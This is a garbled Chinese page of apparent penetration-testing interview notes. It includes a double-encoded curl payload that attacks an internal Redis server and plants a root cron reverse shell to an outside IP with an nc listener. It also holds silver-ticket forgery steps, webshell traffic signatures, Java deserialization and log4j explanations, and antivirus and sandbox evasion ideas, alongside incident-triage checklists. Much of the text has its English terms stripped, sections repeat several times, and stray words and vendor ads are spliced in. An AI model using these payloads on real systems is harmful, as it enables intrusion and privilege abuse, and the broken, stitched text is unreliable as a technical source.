限 时 特 惠: 本站每日持续稳定更新内部创业教程,一年会员只需98元,全站资源免费下载 点击查看详情
站 长 微 信: muyang-0410

协议可配合linux下的curl命令伪造POST请求包发给内网主机。

此种方法能攻击成功的前提条件是:redis是以root权限运行的。

如下:

curl -v '

://172.21.0.2:6379/

_*1%250d%250a%248%250d%%250d%250a%2a3%250d%250a%243%250d%%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.220.140%%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%%250d%250a%243%250d%%250d%250a%243%250d%%250d%250a%2416%250d%250a%2fvar%%%2f%250d%250a%2a4%250d%250a%246%250d%%250d%250a%243%250d%%250d%250a%2410%250d%%250d%250a%244%250d%%250d%250a%2a1%250d%250a%244%250d%%250d%%250d%250a'

redis命令进行了两次url编码,这里是通过协议伪造的请求包用curl命令来发送;

采用的是bash反弹,定时程序路径是/var/spool/cron/root

发送请求之前在公网机192.168.220.140开启nc监听端口2333

nc -lvp 2333 (或nc -l 2333)

流量

冰蝎 2.0 强特征是 里面有个 q=.2

冰蝎 3.0 -Type: /octet-

冰蝎 4.0 ua头 头 默认 秘闻长度16整数倍

蚁剑是 ua 有 蚁剑的加密特征是以 “0x…..=”开头

哥斯拉 pass 字段

菜刀流量存在一些特征字 eval

AWVS 扫描器的特征 :主要是看请求包中是否含有 wvs 字段

扫描器的特征: 字段

java漏洞

shiro( Shiro框架提供了记住我()的功能,关闭浏览器再次访问时无需再登录即可访问。

shiro默认使用ger,对的做了加密处理,

在er类中将中字段内容先后进行序列化、

AES加密、编码操作。服务器端识别身份解密处理的流程则是:

获取 -> 解码->AES解密(加密密钥硬编码)->反序列化(未作过滤处理)。

但是AES加密的密钥Key被硬编码(密钥初始就被定义好不能动态改变的)在代码里,这就意味着每个人通过源代码都能拿到AES加密的密钥。

因此,攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、编码后,作为的字段发送。

Shiro将进行解密并且反序列化,最终就造成了反序列化的RCE漏洞。只要的AES加密密钥泄露,

无论shiro是什么版本都可能会导致该漏洞的产生.硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。

如果在返回包的 Set- 中存在 = 字段,那么就可能存在此漏洞。

————————————————

和721的区别

主要区别在于使用已知默认密码,只要有足够的密码,不需要 的

的ase加密的key为系统随机生成,需要利用登录后的去爆破正确的key值。

利用有效的 作为 的前缀,再去构造反序列化攻击。

(4.反序列化漏洞原理

使用功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,

在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,

并且会调用这个库的或者方法,然而,@type的类有可能被恶意构造,

只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。

常见的有sun官方提供的一个类com.sun..,

其中有个方法支持传入一个rmi的源,只要解析其中的url就会支持远程调用!

)(@tamp)

(的WLS 组件对外提供服务,

其中使用了来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,

导致可执行任意命令。

1.3漏洞利用

访问 /wls-wsat/,返回如下页面,则可能存在此漏洞。)

log4j(框架下的查询服务提供了{}字段解析功能,

传进去的值会被直接解析。例如${java:}会被替换为对应的java版本。

这样如果不对的出栈进行限制,就有可能让查询指向任何服务

(可能是攻击者部署好的恶意代码)。

攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,

在的{}里面构造,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,

造成了远程代码执行(可反弹shell到指定服务器)。)(流量jnd${log4j:123}i)

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/ 查看是否有 IP 爆破成功->

第二步:查看/etc/ 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/. 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 日志分析操作命令记录->

最后一步:分析 redis、sql 、mysql、 等日志文件

** 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令, 查看网络连接对应的进程,再通

过 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 .msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 .msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log 查看管理员登录时间、用户是否存在异常->

第六步:运行 .msc 排查有无可疑的计划任务->

第七步:输入%% 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 的 logs 文件夹 日志文件 的

.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/ 查看是否有 IP 爆破成功->

第二步:查看/etc/ 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/. 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱mimikatz,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 日志分析操作命令记录->

最后一步:分析 redis、sql 、mysql、 等日志文件

** 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令, 查看网络连接对应的进程,再通

过 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 .msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 .msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log 查看管理员登录时间、用户是否存在异常->

第六步:运行 .msc 排查有无可疑的计划任务->

第七步:输入%% 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 的 logs 文件夹 日志文件 的

.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/ 查看是否有 IP 爆破成功->

第二步:查看/etc/ 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/. 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 日志分析操作命令记录->

最后一步:分析 redis、sql 、mysql、 等日志文件

** 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令,查看网络连接对应的进程,再通

过 进行进程定位)->

第二步:查看系统登录日志mimikatz,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 .msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 .msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log 查看管理员登录时间、用户是否存在异常->

第六步:运行 .msc 排查有无可疑的计划任务->

第七步:输入%% 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 的 logs 文件夹 日志文件 的

.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/ 查看是否有 IP 爆破成功->

第二步:查看/etc/ 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/. 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 日志分析操作命令记录->

最后一步:分析 redis、sql 、mysql、 等日志文件

** 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令, 查看网络连接对应的进程,再通

过 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 .msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 .msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log 查看管理员登录时间、用户是否存在异常->

第六步:运行 .msc 排查有无可疑的计划任务->

第七步:输入%% 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 的 logs 文件夹 日志文件 的

.log 日志文件。

陆续推出青藤万相·主机自适应安全平台、青藤蜂巢·云原生安全平台、青藤猎鹰·威胁狩猎平台、

青藤雷火·AI-检测系统、青藤零域

制作白银票据 (上篇黄金票据已经截过图,主要使用用工具还是和)

制作白银票据的条件:

1.域名称

2.域的SID值

3.域的服务账户的密码HASH

4.伪造的用户名,可以是任意用户名,一般伪造

5.需要访问的服务

第一步:

管理员权限运行

::debug #提升权限

:: #获取账户hash 和sid(同一个域下得sid一样)

第二步:

清空本地票据缓存

::purge #清理本地票据缓存

::list #查看本地保存的票据

第三步:

伪造白银票据并导入

:: /:.com /sid:S-1-5-21– /:win08..com /rc4: /:cifs /user: /ptt

第四步:

访问域控的共享目录

dir \win08c$

远程登陆,执行命令

.exe \win08 cmd.exe

#查看权限

黄金票据

1.域名称[AD 模块:(Get-).]

2.域的SID 值[AD 模块:(Get-)..Value]

3.域的账户NTLM密码哈希

4.伪造用户名

原理

1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883)

2.利用T3协议配合RMP或ND接口反向发送反序列化数据(-3248、-2628、-2893、-3245、CVE-2018-3191、CVE-2020-14644、CVE-2020-14645)还有利用IIOP协议的CVE-2020-2551

3.通过 XML方式发送反序列化数据。(-3506->CVE-2017-10271->-2725->CVE-2019-2729)

xml反序列化

原理:xml反序列化,这是wls 组件对外提供的页面,通过功能来解析用户的xml数据导致的任意字符串被当做代码去执行

特征:服务器开放7001端口 传递xml数到wls-wsat 数据包内容有bash或者字段。

stu2

stu2-045:

默认使用org…..est 类对上传数据进行解析.est类在处理-Type时如果获得非预期的值的话,将会抛出一个异常,对这个异常的处理会对错误信息进行OGNL表达式解析,从而造成了恶意代码执行

站库分离打法

对站库分离类型站点通常可以有两个渗透入口点。

web 网站

数据库

渗透思路其实也是比较常规。但是这里如果两个入口点无非两种路径。

从 web 网站打入进而打站库分离的数据库,内网渗透

从数据库打入进而打站库分离的 web 网站,内网渗透

Java内存马排查思路

内存马在语言类型上有PHP内存马,内存马,而本文主要侧重于“市场占有率”最高的java内存马的检测与查杀,java内存马又主要分为下面这三大类

-api类

拦截器

Java 类

agent型

内存马特征的识别

检测工具(,java–)

ridis主从复制

主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(),后者称为从节点(slave);

数据的复制是单向的,只能由主节点到从节点。

默认情况下,每台Redis服务器都是主节点,且一个主节点可以有多个从节点(或没有从节点),但一个从节点只能有一个主节点。

403绕过

使用插件 X–For

使用

使用插件 r【推荐】

修改HOST

覆盖请求URL

标头绕过

代理IP

扩展名绕过

免杀思路

特征码检测

对文件或内存中存在的特征做检测,一般的方法是做模糊哈希或者机器学习跑模型,优点是准确度高,缺点是对未知木马缺乏检测能力。所以目前依赖厂商的更新,厂商做的更新及时能有效提高杀软的防护水平。目前一些杀软对相似的病毒有一定的检测能力,猜测是基于模糊哈希做的。部分杀软同样对于加壳也有检测能力,对于不同的厂家有不同的策略,有些会对文件进行标记,而某数字会直接告警。

关联检测

检测的特征不仅仅是恶意的特征,也可能是一组关联的代码,把一组关联信息作为特征。比如在使用加载器加载时,需要开辟内存,将加载进内存,最后执行内存区域。这些步骤就被反病毒人员提取出来作为特征,在调用了一组开辟内存的函数比如之后对该内存使用来更改标示位为可执行并且对该内存进行调用就会触发报毒。以上只是一个简单的例子,具体情况具体分析,部分厂商对其进行了扩展,所以现在使用另外几个函数进行调用也无法免杀。不过其本质还是黑名单,还存在没有被覆盖到的漏网之鱼。

行为检测

行为检测通过hook关键api,以及对各个高危的文件、组件做监控防止恶意程序对系统修改。只要恶意程序对注册表、启动项、系统文件等做操作就会触发告警。最后,行为检测也被应用到了沙箱做为动态检测,对于避免沙箱检测的办法有如下几个:

延时,部分沙箱存在运行时间限制

沙箱检测,对诸如硬盘容量、内存、虚拟机特征做检测

部分沙箱会对文件重命名,可以检测自身文件名是否被更改

面试过程中把面试官带入自己的节奏中

推荐了解以下领域

数据安全

企业安全建设

免杀思路

逆向

限 时 特 惠: 本站每日持续稳定更新内部创业教程,一年会员只需98元,全站资源免费下载 点击查看详情
站 长 微 信: muyang-0410